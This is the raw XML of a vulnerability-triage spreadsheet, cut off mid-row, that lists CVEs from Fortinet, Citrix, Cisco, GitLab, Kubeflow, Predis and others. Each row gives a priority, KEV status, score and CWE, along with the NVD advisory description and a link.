    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S586" r:id="rId585"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S587" r:id="rId586"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S588" r:id="rId587"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S589" r:id="rId588"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S590" r:id="rId589"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S591" r:id="rId590"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S592" r:id="rId591"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S593" r:id="rId592"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S594" r:id="rId593"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S595" r:id="rId594"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S596" r:id="rId595"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S597" r:id="rId596"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S598" r:id="rId597"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S599" r:id="rId598"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S600" r:id="rId599"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S601" r:id="rId600"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S602" r:id="rId601"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S603" r:id="rId602"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S604" r:id="rId603"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S605" r:id="rId604"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S606" r:id="rId605"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S607" r:id="rId606"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S608" r:id="rId607"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S609" r:id="rId608"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S610" r:id="rId609"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S611" r:id="rId610"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S612" r:id="rId611"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S613" r:id="rId612"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S614" r:id="rId613"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S615" r:id="rId614"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S616" r:id="rId615"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S617" r:id="rId616"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S618" r:id="rId617"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S619" r:id="rId618"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S620" r:id="rId619"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S621" r:id="rId620"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S622" r:id="rId621"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S623" r:id="rId622"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S624" r:id="rId623"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S625" r:id="rId624"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S626" r:id="rId625"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S627" r:id="rId626"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S628" r:id="rId627"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S629" r:id="rId628"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S630" r:id="rId629"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S631" r:id="rId630"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S632" r:id="rId631"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S633" r:id="rId632"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S634" r:id="rId633"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S635" r:id="rId634"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S636" r:id="rId635"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S637" r:id="rId636"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S638" r:id="rId637"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S639" r:id="rId638"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S640" r:id="rId639"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S641" r:id="rId640"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S642" r:id="rId64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4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Added to KEV</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-25249</t>
        </is>
      </c>
      <c r="D2" s="5" t="inlineStr"/>
      <c r="E2" s="5" t="inlineStr"/>
      <c r="F2" s="5" t="inlineStr"/>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="n">
        <v>0.024</v>
      </c>
      <c r="I2" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>fortinet:multiple products</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr"/>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>Fortinet FortiOS, FortiSwitchManager, and FortiSASE contain a heap-based buffer overflow vulnerability that allows an attacker to execute unauthorized code or commands via specially crafted packets.</t>
        </is>
      </c>
      <c r="S2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-25249</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19490</t>
        </is>
      </c>
      <c r="D3" s="5" t="inlineStr"/>
      <c r="E3" s="5" t="inlineStr"/>
      <c r="F3" s="5" t="inlineStr"/>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.056</v>
      </c>
      <c r="I3" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr"/>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R3"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S3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19490</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20079</t>
        </is>
      </c>
      <c r="D4" s="5" t="inlineStr"/>
      <c r="E4" s="5" t="inlineStr"/>
      <c r="F4" s="5" t="inlineStr"/>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="n">
        <v>0.758</v>
      </c>
      <c r="I4" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>cisco:secure firewall management center (fmc) and security cloud control (scc) firewall management</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr"/>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4"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S4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20079</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76460</t>
        </is>
      </c>
      <c r="D5" s="5" t="inlineStr"/>
      <c r="E5" s="5" t="inlineStr"/>
      <c r="F5" s="5" t="inlineStr"/>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H5" s="5" t="inlineStr"/>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>cisco:identity services engine</t>
        </is>
      </c>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr"/>
      <c r="P5" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q5" s="5" t="inlineStr"/>
      <c r="R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5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76461</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr"/>
      <c r="E6" s="5" t="inlineStr"/>
      <c r="F6" s="5" t="inlineStr"/>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H6" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I6" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr">
        <is>
          <t>cisco:secure email gateway</t>
        </is>
      </c>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr"/>
      <c r="P6" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q6" s="5" t="inlineStr"/>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>Cisco AsyncOS software for Cisco Secure Email Gateway (SEG) contains a SQL injection vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system.</t>
        </is>
      </c>
      <c r="S6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76461</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85706</t>
        </is>
      </c>
      <c r="D7" s="5" t="inlineStr"/>
      <c r="E7" s="5" t="inlineStr"/>
      <c r="F7" s="5" t="inlineStr"/>
      <c r="G7" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H7" s="5" t="n">
        <v>0.12</v>
      </c>
      <c r="I7" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>gitlab:community edition and enterprise edition</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr"/>
      <c r="P7" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q7" s="5" t="inlineStr"/>
      <c r="R7"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S7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85706</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54745</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr"/>
      <c r="Q8" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-918</t>
        </is>
      </c>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>Kubeflow Pipelines enables users to build and deploy portable, scalable machine learning workflows. Prior to 2.17.0, the Kubeflow Pipelines frontend exposes an unauthenticated server-side request forgery vulnerability through the /_proxy/ route in frontend/server/proxy-middleware.ts. The _routePathWithReferer() function accepts an arbitrary attacker-controlled HTTP or HTTPS target and passes its origin to createProxyMiddleware without a host allowlist or filtering for loopback, link-local, RFC1918, or cluster-local addresses. The route remains outside the authorization middleware when ENABLE_AUTHZ=true and is reachable through /apis/v1beta1/_proxy/, /apis/v2beta1/_proxy/, /pipeline/apis/v1beta1/_proxy/, and /pipeline/apis/v2beta1/_proxy/, including through a crafted Referer header. Requests can forward attacker-controlled methods, headers such as Authorization, Cookie, and X-Forwarded-For, and POST bodies to reachable internal services, while returning the upstream response to the unauthenticated client. This can expose cloud metadata credentials, Kubernetes or service APIs, and other cluster-internal endpoints to unauthorized read or modification. This issue is fixed in version 2.17.0.</t>
        </is>
      </c>
      <c r="S8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54745</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65956</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>10</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr"/>
      <c r="Q9" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>KubePi is a Kubernetes multi-cluster management panel. In versions up to and including 1.6.15, the SSO configuration API endpoints are exposed on the same public routing boundary as the SSO login and callback endpoints, so SSO, OIDC, and SAML management operations can be reached without administrator authorization. Because reading, creating, and updating the global SSO configuration is not restricted to administrators, an unauthorized or low-privileged user can inspect or alter the authentication configuration, which under certain conditions can lead to account takeover or privilege escalation. The SSO connectivity-test function can additionally be abused as a server-side request forgery primitive, and the user list API returns user objects without consistently clearing authentication-related fields. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="S9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65956</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84372</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr"/>
      <c r="Q10" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>Predis is a flexible and feature-complete Redis and Valkey client for PHP. From version 3.0.0-RC1 until version 3.3.0, pipeline handling on aggregate cluster and replication connections reparses an already serialized RESP buffer in AbstractAggregateConnection::write() by splitting it with explode("\r\n") instead of honoring RESP length prefixes. Attacker-controlled keys or values containing CRLF sequences can therefore be interpreted by Command::deserializeCommand() as additional commands. On cluster connections, ClusterStrategy::getFakeKey() can route injected keyless commands using the literal fake key value "key", permitting operations such as shard-wide cache deletion, targeted data modification, data reads, or node disruption. On replication connections, malformed reparsing can throw an uncaught exception and repeatedly terminate affected requests. Only pipeline() reaches this vulnerable path; transaction() and MULTI are not affected. This issue is fixed in version 3.3.0.</t>
        </is>
      </c>
      <c r="S10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84372</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77776</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr"/>
      <c r="Q11" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>Headroom's LLM proxy derives the memory owner from the x-headroom-user-id request header. The header is read directly at several points in headroom/proxy/handlers/openai.py, including the chat completion and websocket paths, and nothing binds the value to the caller. A client can therefore name another user's identifier and read or write that user's stored LLM memory. The fix introduces a single resolve_memory_identity seam in headroom/proxy/identity.py that honors the header only for loopback or allowlisted callers and otherwise binds the identity to the proxy-token fingerprint or the operating system user. The pip console script binds 127.0.0.1 by default, but the reference docker-compose.yml ships --host 0.0.0.0 with published ports and no required HEADROOM_PROXY_TOKEN, which the server itself warns about at startup, so a deployment following the shipped compose exposes the affected data-plane routes to the network without authentication.</t>
        </is>
      </c>
      <c r="S11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77776</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85391</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr"/>
      <c r="Q12" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>Peppermint through 0.5.5 contains a hardcoded JWT signing secret in docker-compose.yml that allows unauthenticated attackers to forge session tokens for any account. Attackers can use the published secret to mint valid tokens for arbitrary user IDs and access protected endpoints without credentials.</t>
        </is>
      </c>
      <c r="S12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85391</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87911</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-78</t>
        </is>
      </c>
      <c r="R13"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S13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87911</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19633</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>f86ef6dc-4d3a-42ad-8f28-e6d5547a5007</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr"/>
      <c r="Q14" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>PostgreSQL Anonymizer contains a vulnerability that allows unprivileged masked users to execute arbitrary code by abusing operators, domain casts, or view subqueries that carry untrusted expressions. When these objects are evaluated in the context of the extension’s masking mechanisms, the malicious code can run with elevated privileges. The issue is fixed in PostgreSQL Anonymizer 3.1.4 and later versions</t>
        </is>
      </c>
      <c r="S14" s="6" t="inlineStr">
